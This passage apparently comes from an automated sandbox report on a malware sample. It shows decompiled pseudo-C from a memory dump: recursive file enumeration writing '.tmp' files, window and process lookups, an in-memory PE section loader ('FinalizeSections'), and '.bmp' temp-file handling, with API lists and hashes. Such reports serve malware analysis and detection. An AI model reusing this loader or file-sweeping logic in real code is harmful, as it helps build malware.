                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandlePointerWrite
                                    • String ID:
                                    • API String ID: 3604237281-0
                                    • Opcode ID: 6376c2b48263b4c1bcd54d62db4f0b960adfb34c8463ff23cffeebe42344fecb
                                    • Instruction ID: 5ed0753c6fea422317e33076f06a6fa9ab87e84fcccc2cc94ce371dbbe804708
                                    • Opcode Fuzzy Hash: 6376c2b48263b4c1bcd54d62db4f0b960adfb34c8463ff23cffeebe42344fecb
                                    • Instruction Fuzzy Hash: 8A01D8B0640304BBFB10D774DC92F5EBAECEF58B18F600565B508FB1D5D6B46E808914
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24015DF8, Relevance: 6.0, APIs: 4, Instructions: 39timefileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E24015DF8(WORD* __eax) {
				struct _FILETIME _v12;
				long _t20;
				WORD* _t30;
				void* _t35;
				struct _FILETIME* _t36;

				_t36 = _t35 + 0xfffffff8;
				_t30 = __eax;
				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
						continue;
					} else {
						_t20 = GetLastError();
					}
					L5:
					return _t20;
				}
				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
				_t30[2] = _t30[0x1c];
				_t30[4] = _t30[0xc].dwFileAttributes;
				E240132EC( &(_t30[6]), 0x104,  &(_t30[0x22]));
				_t20 = 0;
				goto L5;
			}








                                    0x24015df9
                                    0x24015dfc
                                    0x24015e18
                                    0x24015e0f
                                    0x00000000
                                    0x24015e11
                                    0x24015e11
                                    0x24015e11
                                    0x24015e57
                                    0x24015e5a
                                    0x24015e5a
                                    0x24015e25
                                    0x24015e34
                                    0x24015e3c
                                    0x24015e42
                                    0x24015e50
                                    0x24015e55
                                    0x00000000

                                    APIs
                                    • FindNextFileA.KERNEL32(?,?), ref: 24015E08
                                    • GetLastError.KERNEL32(?,?), ref: 24015E11
                                    • FileTimeToLocalFileTime.KERNEL32(?), ref: 24015E25
                                    • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 24015E34
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: FileTime$DateErrorFindLastLocalNext
                                    • String ID:
                                    • API String ID: 2103556486-0
                                    • Opcode ID: 30394785ffedbd128b073228050ec16ea56634397081f98a4446c0468ed105bc
                                    • Instruction ID: 30b542861af9b95c935578d66826676e138c2e0e2c448d167219a7f664d14447
                                    • Opcode Fuzzy Hash: 30394785ffedbd128b073228050ec16ea56634397081f98a4446c0468ed105bc
                                    • Instruction Fuzzy Hash: 17F037B66042009FDF08DFA4D8C1D8B33ECAF5822470489A6ED18CF24EE634E594CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24015AC8, Relevance: 6.0, APIs: 4, Instructions: 25windowsleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E24015AC8(struct tagMSG* __eax) {
				long _t7;
				MSG* _t8;

				_t8 = __eax;
				_t7 = 0;
				if(PeekMessageA(__eax, 0, 0, 0, 1) != 0) {
					_t7 = 1;
					if(_t8->message != 0x12) {
						TranslateMessage(_t8);
						DispatchMessageA(_t8);
					}
				}
				Sleep(1);
				return _t7;
			}





                                    0x24015aca
                                    0x24015acc
                                    0x24015ade
                                    0x24015ae0
                                    0x24015ae6
                                    0x24015ae9
                                    0x24015aef
                                    0x24015aef
                                    0x24015ae6
                                    0x24015af6
                                    0x24015aff

                                    APIs
                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 24015AD7
                                    • TranslateMessage.USER32 ref: 24015AE9
                                    • DispatchMessageA.USER32 ref: 24015AEF
                                    • Sleep.KERNEL32(00000001,?,00000000,00000000,00000000,00000001,?,00000000,24015B0A), ref: 24015AF6
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchPeekSleepTranslate
                                    • String ID:
                                    • API String ID: 3768732053-0
                                    • Opcode ID: 3dee2935046c145a20310657923f066b4c1650418999a03fa847e1f3cf1e7d93
                                    • Instruction ID: ec003d8bd3dd4e3304982c0b8c72bc4a419aab1b3e91c21113df2684906d3d7b
                                    • Opcode Fuzzy Hash: 3dee2935046c145a20310657923f066b4c1650418999a03fa847e1f3cf1e7d93
                                    • Instruction Fuzzy Hash: 06E017323837203AFB2156A40C82F9E62884F22A8EF904136F609AE0C4CAD5598082A9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2401548A, Relevance: 6.0, APIs: 4, Instructions: 12memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E2401548A(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





                                    0x2401548f
                                    0x24015496
                                    0x2401549b
                                    0x240154a1
                                    0x240154a6

                                    APIs
                                    • GlobalHandle.KERNEL32 ref: 2401548F
                                    • GlobalUnWire.KERNEL32(00000000), ref: 24015496
                                    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 2401549B
                                    • GlobalFix.KERNEL32(00000000), ref: 240154A1
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Global$AllocHandleWire
                                    • String ID:
                                    • API String ID: 2210401237-0
                                    • Opcode ID: 505157e451beb4b904f6f62bc6a33cc31f1955a287db27c020f03c767c2bc075
                                    • Instruction ID: 6b35823ccddb0685b72670d5de8fa8187fdb398a74d14d3d294bcd9ea60d1cc9
                                    • Opcode Fuzzy Hash: 505157e451beb4b904f6f62bc6a33cc31f1955a287db27c020f03c767c2bc075
                                    • Instruction Fuzzy Hash: 02B002C49906043DBB166BF45C19D3F105C9FB450978449543448DA008D8689E9840B1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24043548, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 67%
                                    			E24043548(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v9;
				char _v10;
				char _v16;
				char _v20;
				intOrPtr _v352;
				signed int _v356;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				char _v380;
				char _v384;
				char _v388;
				signed int _t93;
				signed int _t97;
				void* _t114;
				void* _t136;
				intOrPtr _t157;
				intOrPtr _t162;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t169;
				intOrPtr _t170;
				intOrPtr _t179;
				void* _t185;
				void* _t186;
				intOrPtr _t187;

				_t183 = __esi;
				_t182 = __edi;
				_t185 = _t186;
				_t187 = _t186 + 0xfffffe80;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v388 = 0;
				_v384 = 0;
				_v376 = 0;
				_v380 = 0;
				_v372 = 0;
				_v368 = 0;
				_v16 = 0;
				_v20 = 0;
				_v9 = __ecx;
				_v8 = __edx;
				_t136 = __eax;
				_t157 =  *0x24015a98; // 0x24015a9c
				E240139CC( &_v364, _t157);
				_push(_t185);
				_push(0x24043832);
				_push( *[fs:eax]);
				 *[fs:eax] = _t187;
				_v10 = 0;
				E24013120( &_v16, _t136);
				E24013088(_a4);
				if( *((char*)(_v16 + E2401333C(_v16) - 1)) != 0x5c) {
					E24013344( &_v16, 0x24043850);
				}
				_push(_t185);
				_push(0x240436f4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t187;
				E24013388( &_v368, _v8, _v16);
				if(E240163E8(_v368,  &_v364, 0x2f) != 0) {
					_pop(_t162);
					 *[fs:eax] = _t162;
					__eflags = _v9;
					if(_v9 == 0) {
						L21:
						__eflags = 0;
						_pop(_t163);
						 *[fs:eax] = _t163;
						_push(0x24043839);
						E240130AC( &_v388, 6);
						_t165 =  *0x24015a98; // 0x24015a9c
						E24013A90( &_v364, _t165);
						return E240130AC( &_v20, 2);
					} else {
						_push(_t185);
						_push(0x240437ec);
						_push( *[fs:eax]);
						 *[fs:eax] = _t187;
						E24013388( &_v384, 0x2404386c, _v16);
						_t93 = E240163E8(_v384,  &_v364, 0x10);
						__eflags = _t93;
						if(_t93 != 0) {
							_pop(_t169);
							 *[fs:eax] = _t169;
							goto L21;
						} else {
							__eflags = 0;
							_push(_t185);
							_push(0x240437db);
							_push( *[fs:eax]);
							 *[fs:eax] = _t187;
							while(1) {
								__eflags = _v356 & 0x00000010;
								if((_v356 & 0x00000010) != 0) {
									E24013480(_v352, 0x24043878);
									if(__eflags != 0) {
										E24013480(_v352, 0x24043884);
										if(__eflags != 0) {
											E24013388( &_v388, _v352, _v16);
											_v10 = E24043548(_v388, _t136, 1, _v8, _t182, _t183, _a4);
										}
									}
								}
								_t97 = E24015E5C( &_v364);
								__eflags = _t97;
								if(_t97 != 0) {
									break;
								}
								__eflags = _v10 - 1;
								if(_v10 != 1) {
									continue;
								}
								break;
							}
							__eflags = 0;
							_pop(_t170);
							 *[fs:eax] = _t170;
							_push(0x240437e2);
							return E24015DDC( &_v364);
						}
					}
				} else {
					_push(_t185);
					_push(0x240436e3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t187;
					do {
						_t152 = _v352;
						E24013388( &_v372, _v352, _v16);
						_t114 = E2401333C(_v372);
						_t191 = _t114 - 3;
						if(_t114 > 3) {
							_v10 = 1;
							_t152 = _v352;
							E24013388(_a4, _v352, _v16);
						}
						E24017038( &_v376);
						_push(_v376);
						E240158BC( &_v380, _t152, 0, GetTickCount(), 0);
						_push(_v380);
						_push(".tmp");
						E240133FC();
						E24016DA0(_v20, _t136, 0, 0, _t183, _t191);
						E24016634(_v20, _t136, _t182, _t183, _t191);
					} while (E24015E5C( &_v364) == 0 && _v10 != 1);
					_pop(_t179);
					 *[fs:eax] = _t179;
					_push(0x240436ea);
					return E24015DDC( &_v364);
				}
			}































                                    0x24043548
                                    0x24043548
                                    0x24043549
                                    0x2404354b
                                    0x24043551
                                    0x24043552
                                    0x24043553
                                    0x24043556
                                    0x2404355c
                                    0x24043562
                                    0x24043568
                                    0x2404356e
                                    0x24043574
                                    0x2404357a
                                    0x2404357d
                                    0x24043580
                                    0x24043583
                                    0x24043586
                                    0x2404358e
                                    0x24043594
                                    0x2404359b
                                    0x2404359c
                                    0x240435a1
                                    0x240435a4
                                    0x240435a7
                                    0x240435b0
                                    0x240435b8
                                    0x240435cd
                                    0x240435d7
                                    0x240435d7
                                    0x240435de
                                    0x240435df
                                    0x240435e4
                                    0x240435e7
                                    0x240435f6
                                    0x24043613
                                    0x240436ec
                                    0x240436ef
                                    0x240436fe
                                    0x24043702
                                    0x240437f6
                                    0x240437f6
                                    0x240437f8
                                    0x240437fb
                                    0x240437fe
                                    0x2404380e
                                    0x24043819
                                    0x2404381f
                                    0x24043831
                                    0x24043708
                                    0x2404370a
                                    0x2404370b
                                    0x24043710
                                    0x24043713
                                    0x24043724
                                    0x2404373a
                                    0x2404373f
                                    0x24043741
                                    0x240437e4
                                    0x240437e7
                                    0x00000000
                                    0x24043747
                                    0x24043747
                                    0x24043749
                                    0x2404374a
                                    0x2404374f
                                    0x24043752
                                    0x24043755
                                    0x24043755
                                    0x2404375c
                                    0x24043769
                                    0x2404376e
                                    0x2404377b
                                    0x24043780
                                    0x24043795
                                    0x240437aa
                                    0x240437aa
                                    0x24043780
                                    0x2404376e
                                    0x240437b3
                                    0x240437b8
                                    0x240437ba
                                    0x00000000
                                    0x00000000
                                    0x240437bc
                                    0x240437c0
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x240437c0
                                    0x240437c2
                                    0x240437c4
                                    0x240437c7
                                    0x240437ca
                                    0x240437da
                                    0x240437da
                                    0x24043741
                                    0x24043619
                                    0x2404361b
                                    0x2404361c
                                    0x24043621
                                    0x24043624
                                    0x24043627
                                    0x2404362d
                                    0x24043636
                                    0x24043641
                                    0x24043646
                                    0x24043649
                                    0x2404364b
                                    0x24043652
                                    0x2404365b
                                    0x2404365b
                                    0x24043666
                                    0x2404366b
                                    0x24043680
                                    0x24043685
                                    0x2404368b
                                    0x24043698
                                    0x240436a4
                                    0x240436ac
                                    0x240436bc
                                    0x240436cc
                                    0x240436cf
                                    0x240436d2
                                    0x240436e2
                                    0x240436e2

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CountTick
                                    • String ID: *.*$.tmp
                                    • API String ID: 536389180-2468557045
                                    • Opcode ID: 215e903d0c2b7747ec63faeb126c53ab73d67b6c0f67ac7af5a966e4d368dce6
                                    • Instruction ID: 37253bb79b1bfd5732f7910031b3fb312b6d8f74392ec756935e3339d8d5c105
                                    • Opcode Fuzzy Hash: 215e903d0c2b7747ec63faeb126c53ab73d67b6c0f67ac7af5a966e4d368dce6
                                    • Instruction Fuzzy Hash: F1715034E042189FEB11DF61EC90ADEBBB5EB59304F5081F9D808A6654DB719EC5CE50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24043260, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 69%
                                    			E24043260(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v16;
				intOrPtr _v348;
				signed int _v352;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				char _v380;
				char _v384;
				signed int _t77;
				signed int _t80;
				void* _t96;
				void* _t116;
				intOrPtr _t132;
				intOrPtr _t137;
				intOrPtr _t139;
				intOrPtr _t144;
				intOrPtr _t152;
				void* _t155;
				void* _t156;
				void* _t158;
				void* _t159;
				intOrPtr _t160;

				_t156 = __esi;
				_t155 = __edi;
				_t158 = _t159;
				_t160 = _t159 + 0xfffffe84;
				_v384 = 0;
				_v380 = 0;
				_v372 = 0;
				_v376 = 0;
				_v368 = 0;
				_v364 = 0;
				_v12 = 0;
				_v16 = 0;
				_v5 = __edx;
				_t116 = __eax;
				_t132 =  *0x24015a98; // 0x24015a9c
				E240139CC( &_v360, _t132);
				_push(_t158);
				_push(0x240434ef);
				_push( *[fs:eax]);
				 *[fs:eax] = _t160;
				E24013120( &_v12, _t116);
				if( *((char*)(_v12 + E2401333C(_v12) - 1)) != 0x5c) {
					E24013344( &_v12, 0x24043504);
				}
				E24013388( &_v364, 0x24043510, _v12);
				if(E240163E8(_v364,  &_v360, 0x2f) != 0) {
					__eflags = _v5;
					if(_v5 == 0) {
						L17:
						__eflags = 0;
						_pop(_t137);
						 *[fs:eax] = _t137;
						_push(0x240434f6);
						E240130AC( &_v384, 6);
						_t139 =  *0x24015a98; // 0x24015a9c
						E24013A90( &_v360, _t139);
						return E240130AC( &_v16, 2);
					} else {
						E24013388( &_v380, 0x24043510, _v12);
						_t77 = E240163E8(_v380,  &_v360, 0x10);
						__eflags = _t77;
						if(_t77 != 0) {
							goto L17;
						} else {
							__eflags = 0;
							_push(_t158);
							_push(0x240434ac);
							_push( *[fs:eax]);
							 *[fs:eax] = _t160;
							do {
								__eflags = _v352 & 0x00000010;
								if((_v352 & 0x00000010) != 0) {
									E24013480(_v348, 0x24043538);
									if(__eflags != 0) {
										E24013480(_v348, 0x24043544);
										if(__eflags != 0) {
											E24013388( &_v384, _v348, _v12);
											E24043260(_v384, _t116, 1, _t155, _t156);
										}
									}
								}
								_t80 = E24015E5C( &_v360);
								__eflags = _t80;
							} while (_t80 == 0);
							__eflags = 0;
							_pop(_t144);
							 *[fs:eax] = _t144;
							_push(0x240434b3);
							return E24015DDC( &_v360);
						}
					}
				} else {
					_push(_t158);
					_push(0x240433e6);
					_push( *[fs:eax]);
					 *[fs:eax] = _t160;
					do {
						_t127 = _v348;
						E24013388( &_v368, _v348, _v12);
						_t96 = E2401333C(_v368);
						_t164 = _t96 - 3;
						if(_t96 > 3) {
							_push( *0x24063274);
							_push(_v12);
							_push(_v348);
							_push(0x2404351c);
							E240133FC();
						}
						E24017038( &_v372);
						_push(_v372);
						E240158BC( &_v376, _t127, 0, GetTickCount(), 0);
						_push(_v376);
						_push(".tmp");
						E240133FC();
						E24016DA0(_v16, _t116, 0, 0, _t156, _t164);
						E24016634(_v16, _t116, _t155, _t156, _t164);
					} while (E24015E5C( &_v360) == 0);
					_pop(_t152);
					 *[fs:eax] = _t152;
					_push(0x240433ed);
					return E24015DDC( &_v360);
				}
			}





























                                    0x24043260
                                    0x24043260
                                    0x24043261
                                    0x24043263
                                    0x2404326c
                                    0x24043272
                                    0x24043278
                                    0x2404327e
                                    0x24043284
                                    0x2404328a
                                    0x24043290
                                    0x24043293
                                    0x24043296
                                    0x24043299
                                    0x240432a1
                                    0x240432a7
                                    0x240432ae
                                    0x240432af
                                    0x240432b4
                                    0x240432b7
                                    0x240432bf
                                    0x240432d4
                                    0x240432de
                                    0x240432de
                                    0x240432f1
                                    0x2404330e
                                    0x240433ed
                                    0x240433f1
                                    0x240434b3
                                    0x240434b3
                                    0x240434b5
                                    0x240434b8
                                    0x240434bb
                                    0x240434cb
                                    0x240434d6
                                    0x240434dc
                                    0x240434ee
                                    0x240433f7
                                    0x24043405
                                    0x2404341b
                                    0x24043420
                                    0x24043422
                                    0x00000000
                                    0x24043428
                                    0x24043428
                                    0x2404342a
                                    0x2404342b
                                    0x24043430
                                    0x24043433
                                    0x24043436
                                    0x24043436
                                    0x2404343d
                                    0x2404344a
                                    0x2404344f
                                    0x2404345c
                                    0x24043461
                                    0x24043472
                                    0x2404347f
                                    0x2404347f
                                    0x24043461
                                    0x2404344f
                                    0x2404348a
                                    0x2404348f
                                    0x2404348f
                                    0x24043493
                                    0x24043495
                                    0x24043498
                                    0x2404349b
                                    0x240434ab
                                    0x240434ab
                                    0x24043422
                                    0x24043314
                                    0x24043316
                                    0x24043317
                                    0x2404331c
                                    0x2404331f
                                    0x24043322
                                    0x24043328
                                    0x24043331
                                    0x2404333c
                                    0x24043341
                                    0x24043344
                                    0x24043346
                                    0x2404334c
                                    0x2404334f
                                    0x24043355
                                    0x24043364
                                    0x24043364
                                    0x2404336f
                                    0x24043374
                                    0x24043389
                                    0x2404338e
                                    0x24043394
                                    0x240433a1
                                    0x240433ad
                                    0x240433b5
                                    0x240433c5
                                    0x240433cf
                                    0x240433d2
                                    0x240433d5
                                    0x240433e5
                                    0x240433e5

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CountTick
                                    • String ID: *.*$.tmp
                                    • API String ID: 536389180-2468557045
                                    • Opcode ID: dea71bdec357385d546c9d4b0d664928b877121005b96e2f1b09aa287177ce46
                                    • Instruction ID: d1578ef7fe3caef001175479f2ee01a6438ae49632ed9a4af3455219784554d6
                                    • Opcode Fuzzy Hash: dea71bdec357385d546c9d4b0d664928b877121005b96e2f1b09aa287177ce46
                                    • Instruction Fuzzy Hash: 06512E34E082589FEF15DBA0EC90ADEB7B5EB95304F5041F5980CA2258DA75AEC58E50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24040224, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108threadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 48%
                                    			E24040224(struct HWND__* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				char _v20;
				struct HWND__* _t65;
				intOrPtr _t79;
				intOrPtr _t82;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t100;

				_t99 = _t100;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __edx;
				_t65 = __eax;
				_push(_t99);
				_push(0x24040372);
				_push( *[fs:eax]);
				 *[fs:eax] = _t100;
				E24013088(__edx);
				if(IsWindow(_t65) != 0) {
					_v12 = 0xffffffff;
					GetWindowThreadProcessId(_t65,  &_v12);
					_push(_t99);
					_push(0x24040345);
					_push( *[fs:eax]);
					 *[fs:eax] = _t100;
					if(E240401F0( &_v8, _t65, 1, __edi, _t97) != 0) {
						E240158BC( &_v16, 0, 0, _v12, 0);
						E24013344( &_v16, 0x24040388);
						if(E24013674(_v16, _v8) > 0) {
							E240158BC( &_v20, 0, 0, _v12, 0);
							E24013344( &_v20, 0x24040388);
							E240135D0( &_v8, E24013674(_v20, _v8) - 1, 1);
							E240135D0( &_v8, E24013674(0x24040388, _v8) - 1, 1);
							E240135D0( &_v8, 3, 1);
							E24013590(_v8, E24013674(0x24040388, _v8) - 1, 1, _t97);
						}
					}
					_pop(_t82);
					 *[fs:eax] = _t82;
				}
				_pop(_t79);
				 *[fs:eax] = _t79;
				_push(0x24040379);
				E240130AC( &_v20, 2);
				return E24013088( &_v8);
			}













                                    0x24040225
                                    0x24040229
                                    0x2404022a
                                    0x2404022b
                                    0x2404022c
                                    0x2404022d
                                    0x2404022e
                                    0x2404022f
                                    0x24040230
                                    0x24040232
                                    0x24040236
                                    0x24040237
                                    0x2404023c
                                    0x2404023f
                                    0x24040244
                                    0x24040251
                                    0x24040257
                                    0x24040263
                                    0x2404026a
                                    0x2404026b
                                    0x24040270
                                    0x24040273
                                    0x24040282
                                    0x24040292
                                    0x2404029f
                                    0x240402b1
                                    0x240402c1
                                    0x240402ce
                                    0x240402e9
                                    0x24040306
                                    0x24040318
                                    0x24040336
                                    0x24040336
                                    0x240402b1
                                    0x2404033d
                                    0x24040340
                                    0x24040340
                                    0x24040351
                                    0x24040354
                                    0x24040357
                                    0x24040364
                                    0x24040371

                                    APIs
                                    • IsWindow.USER32 ref: 2404024A
                                    • GetWindowThreadProcessId.USER32(?,FFFFFFFF), ref: 24040263
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Window$ProcessThread
                                    • String ID: #|#
                                    • API String ID: 3635926707-3836175907
                                    • Opcode ID: b6d07c3b43f599eb5bfb450a5e3e1957ba9094c29219a3d3504a286258c8a8fd
                                    • Instruction ID: 8fa68bf8bbf1c1a9312dcd59fd21bb95d7332983f5c62f5b51aff3138c6fc3c1
                                    • Opcode Fuzzy Hash: b6d07c3b43f599eb5bfb450a5e3e1957ba9094c29219a3d3504a286258c8a8fd
                                    • Instruction Fuzzy Hash: 60316770A04108AFFF05EBA4C894DAEB7FDEB98344F5085B5E805B7654EA70AF858960
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24023CEC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E24023CEC(void* __eflags, int* _a4) {
				long _v8;
				int _t29;
				int _t43;
				signed char _t44;
				long _t46;
				void* _t48;
				void* _t49;

				_t43 = E24023838(__eflags,  *_a4);
				_t29 =  *_a4;
				_t48 = ( *(_t29 + 6) & 0x0000ffff) - 1;
				if(_t48 < 0) {
					L16:
					return _t29;
				}
				_t49 = _t48 + 1;
				do {
					if(( *(_t43 + 0x27) & 0x00000002) == 0) {
						_t46 = E24023C74( *(_t43 + 0x24));
						_t44 =  *(_t43 + 0x24);
						__eflags = _t44 & 0x04000000;
						if((_t44 & 0x04000000) != 0) {
							_t46 = _t46 | 0x00000200;
							__eflags = _t46;
						}
						_t29 =  *(_t43 + 0x10);
						__eflags = _t29;
						if(_t29 != 0) {
							L14:
							_t43 = _t43 + 0x28;
							__eflags = _t43;
							goto L15;
						} else {
							__eflags = _t44 & 0x00000040;
							if((_t44 & 0x00000040) == 0) {
								__eflags = _t44 & 0x00000080;
								if((_t44 & 0x00000080) != 0) {
									_t29 =  *( *_a4 + 0x24);
								}
							} else {
								_t29 =  *( *_a4 + 0x20);
							}
							__eflags = _t29;
							if(_t29 <= 0) {
								goto L14;
							} else {
								_t29 = VirtualProtect( *(_t43 + 8),  *(_t43 + 0x10), _t46,  &_v8);
								__eflags = _t29;
								if(_t29 != 0) {
									goto L14;
								}
								return E240130DC(0x2405bb68, "FinalizeSections: VirtualProtect failed");
							}
						}
					}
					_t29 = VirtualFree( *(_t43 + 8),  *(_t43 + 0x10), 0x4000);
					_t43 = _t43 + 0x28;
					L15:
					_t49 = _t49 - 1;
				} while (_t49 != 0);
				goto L16;
			}










                                    0x24023cfe
                                    0x24023d03
                                    0x24023d09
                                    0x24023d0c
                                    0x24023da9
                                    0x24023da9
                                    0x24023da9
                                    0x24023d12
                                    0x24023d13
                                    0x24023d17
                                    0x24023d39
                                    0x24023d3b
                                    0x24023d3e
                                    0x24023d44
                                    0x24023d46
                                    0x24023d46
                                    0x24023d46
                                    0x24023d4c
                                    0x24023d4f
                                    0x24023d51
                                    0x24023d9a
                                    0x24023d9a
                                    0x24023d9a
                                    0x00000000
                                    0x24023d53
                                    0x24023d53
                                    0x24023d56
                                    0x24023d62
                                    0x24023d65
                                    0x24023d6c
                                    0x24023d6c
                                    0x24023d58
                                    0x24023d5d
                                    0x24023d5d
                                    0x24023d6f
                                    0x24023d71
                                    0x00000000
                                    0x24023d73
                                    0x24023d80
                                    0x24023d85
                                    0x24023d87
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x24023d93
                                    0x24023d71
                                    0x24023d51
                                    0x24023d26
                                    0x24023d2b
                                    0x24023d9d
                                    0x24023d9d
                                    0x24023d9d
                                    0x00000000

                                    APIs
                                    • VirtualFree.KERNEL32(?,00000000,00004000,?,00000000,?,00000000,?,?,24023F92,?,?,00004550,00004550,?,00000000), ref: 24023D26
                                    • VirtualProtect.KERNEL32(?,00000000,00000000,?,?,?,00000000,?,00000000,?,?,24023F92,?,?,00004550,00004550), ref: 24023D80
                                    Strings
                                    • FinalizeSections: VirtualProtect failed, xrefs: 24023D8E
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$FreeProtect
                                    • String ID: FinalizeSections: VirtualProtect failed
                                    • API String ID: 2581862158-3584865983
                                    • Opcode ID: aebf29a56cb0b97b5448127fb502d1542f3e3f1a0a2880443c52a4c048301fb4
                                    • Instruction ID: eea04b1de70a75afee23bb317bbe36416205fe35124f65285a42d89cf033c2b1
                                    • Opcode Fuzzy Hash: aebf29a56cb0b97b5448127fb502d1542f3e3f1a0a2880443c52a4c048301fb4
                                    • Instruction Fuzzy Hash: 59213B72700A00AFEB00CF69E8C4F4A7BECAF59694B014191EE48CF395D2B0E9808B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240379F4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 62%
                                    			E240379F4(char __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _t46;
				intOrPtr _t56;
				void* _t62;
				void* _t64;

				_t64 = __eflags;
				_v16 = 0;
				_v20 = 0;
				_t46 = __edx;
				_v8 = __eax;
				E24013524(_v8);
				_push(_t62);
				_push(0x24037ab6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t62 + 0xfffffff0;
				_v12 = E24012658(1);
				E24037850(_v8, _t46,  &_v12, __edi, __esi, _t64);
				E2402316C(_v12, 0, 0);
				E24017038( &_v16);
				_push(_v16);
				E240158BC( &_v20, 0, 0, GetTickCount(), 0);
				_push(_v20);
				_push(".bmp");
				E240133FC();
				DeleteFileA(E24013534( *_t46));
				E24023640(_v12, _t46,  *_t46);
				E24012688(_v12);
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x24037abd);
				E240130AC( &_v20, 2);
